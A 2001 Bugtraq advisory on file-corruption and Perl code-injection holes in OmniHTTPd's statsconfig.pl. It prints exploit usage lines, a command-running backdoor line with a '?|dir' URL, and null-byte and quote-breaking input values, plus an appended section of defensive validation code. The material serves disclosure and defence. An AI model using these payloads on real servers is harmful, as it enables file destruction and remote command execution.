Bugtraq mailing list archives

Vulnerabilities in OmniHTTPd default installation


From: joetesta () HUSHMAIL COM
Date: Mon, 15 Jan 2001 17:19:12 -0800

Vulnerabilities in OmniHTTPd default installation



    Overview

Two vulnerabilities exist within the 'statsconfig.pl' script that
comes with OmniHTTPd v2.07 and is installed by default.  The first
allows a remote attacker to corrupt any file in the system.  The second
allows arbitrary code to be inserted into '/cgi-bin/stats.pl'.



    Details

Here is the offending code:


    if ($FORM{'mostbrowsers'}) {
        $mostbrowsers_str = '$most_browsers = "' .
                                          $FORM{'mostbrowsers'} . '";';
    }

    ...

    unless (-f "$FORM{'cgidir'}/stats.prg") {
        $error .= "<LI>Config couldn't find the file stats.prg in "
                . "your cgi-bin directory.";
        [ exit(); ]
    }

    ...

    $cgifile = "$FORM{'cgidir'}/stats.pl";
    $progfile = "$FORM{'cgidir'}/stats.prg";

    open(CGI, "> $cgifile");
    open(PROG, "$progfile");

    print CGI "#!/usr/local/bin/perl5\n";
    print CGI "#AutoConfiged by Statsconfig.pl\n\n";
    print CGI "$deflimit_str\n$mostip_str\n$mostreq_str\n$mostbrowsers_str\n"
            . "$timelog_str\n$mostipnum_str\n$mostreqf_str\n$mostbrowsernum_str\n"
            . "$logloc_str\n$imagebar_str\n$serveradd_str\n$barwidth_str\n"
            . "$barheight_str\n$listpass_str\n$bgcolor_str\n$bgimage_str\n"
            . "$ttBGcolor_str\n\n$perllib_str\n";

    ...


    None of the variables in %FORM are filtered.  An attacker simply
sets $FORM{'cgidir'} to the absolute path of any file in the system
(followed by a null byte, so the appended '/stats.prg' is ignored), and
that file will be corrupted.  Note that because absolute file names are
used, this exploit is not restricted to the drive the webserver resides
on.
    Code injection is achieved by setting $FORM{'mostbrowsers'} to any
legal value, followed by a semicolon and the payload: the value is
written verbatim inside the double-quoted string in the generated
'stats.pl', so a closing quote and semicolon end the assignment and
whatever follows becomes Perl code.


    Exploit

I've written an exploit in PERL to demonstrate the two vulnerabilities.
    To corrupt a file:

        perl omnismash.pl localhost 80 -corrupt c:/autoexec.bak

    The file you choose will be overwritten with approximately 470
bytes of PERL code.
    To inject code into '/cgi-bin/stats.pl':

        perl omnismash.pl localhost 80 -inject c:/httpd/cgi-bin

    You must pass the absolute path to the cgi-bin directory for this
to work.  This exploit is hard-coded to insert the following line:

        if( $ENV{'QUERY_STRING'} ) { open( QS,$ENV{'QUERY_STRING'} ); }

    With that done, point your browser to
'http://localhost/cgi-bin/stats.pl?|dir'.  You will see a directory
listing of '/cgi-bin'.




    Solution

Erase 'statsconfig.pl' along with any other unnecessary files in your
'cgi-bin'.  If this is not possible in your particular situation,
replace your current 'statsconfig.pl' file with the attached
'statsconfig.fixed' file.  This version allows 'statsconfig.pl' to be
invoked only from localhost.
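The following is an added illustration, not the vendor's code or the attached 'statsconfig.fixed': it shows how the inputs abused in the Details section (cgidir and mostbrowsers) and the localhost-only check from the Solution section can be handled in Perl.  The cgi-bin path in $CGI_ROOT and the sample %FORM values are constructed assumptions.

```perl
#!/usr/local/bin/perl5
use strict;
use warnings;
use File::Spec;

# Added example (not the vendor's fix). Assumes the configurator may only
# ever write into $CGI_ROOT and that %FORM has already been parsed.
my $CGI_ROOT = 'c:/httpd/cgi-bin';                 # assumed install path
my %FORM = (                                        # constructed sample request
    cgidir       => "c:/autoexec.bak\0",            # null-padded path, as in the advisory
    mostbrowsers => '10"; 1; $junk = "',            # value that closes the quoted string
);

# Mitigation from the Solution section: refuse anything not from localhost.
sub from_localhost { my ($ip) = @_; return defined $ip && $ip eq '127.0.0.1'; }

# Normalise slashes and case so Windows spellings of one directory compare equal.
sub norm { my ($p) = @_; $p = File::Spec->canonpath($p); $p =~ s{\\}{/}g; return lc $p; }

# Accept cgidir only if it is byte-clean and names exactly $CGI_ROOT.
# A NUL truncates the name inside the C runtime, which is what lets
# "c:/autoexec.bak\0/stats.prg" pass the -f test and then be opened for writing.
sub safe_cgidir {
    my ($dir) = @_;
    return undef unless defined $dir && length $dir;
    return undef if $dir =~ /\0/ || $dir =~ m{(^|[\\/])\.\.([\\/]|$)};
    return norm($dir) eq norm($CGI_ROOT) ? $CGI_ROOT : undef;
}

# Values are interpolated into Perl source, so allow only characters that
# cannot close the double-quoted string or start a new statement.
sub safe_config_value {
    my ($v) = @_;
    return (defined $v && $v =~ /^[A-Za-z0-9 _.\-]{1,64}$/) ? $v : undef;
}

unless (from_localhost($ENV{'REMOTE_ADDR'})) {
    print "Status: 403 Forbidden\nContent-type: text/plain\n\nLocal use only.\n";
    exit;
}
my $cgidir = safe_cgidir($FORM{'cgidir'})
    or do { print "Content-type: text/plain\n\nRejected cgidir.\n"; exit; };
my $mostbrowsers_str = '';
if (defined(my $mb = safe_config_value($FORM{'mostbrowsers'}))) {
    $mostbrowsers_str = '$most_browsers = "' . $mb . '";';   # safe to interpolate now
} elsif (defined $FORM{'mostbrowsers'}) {
    print "Content-type: text/plain\n\nRejected mostbrowsers.\n"; exit;
}
# ... generation of stats.pl continues here using $cgidir and $mostbrowsers_str
```

With the constructed sample values both inputs are rejected before any file under $cgidir is opened for writing.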




    Vendor Status

Omnicron Technologies Corporation was notified via
<info () omnicron ab ca> and <support () omnicron ab ca> on Monday,
January 8, 2001.  No reply was received.

Attachment: 2000.01.08.OmniHTTPd.zip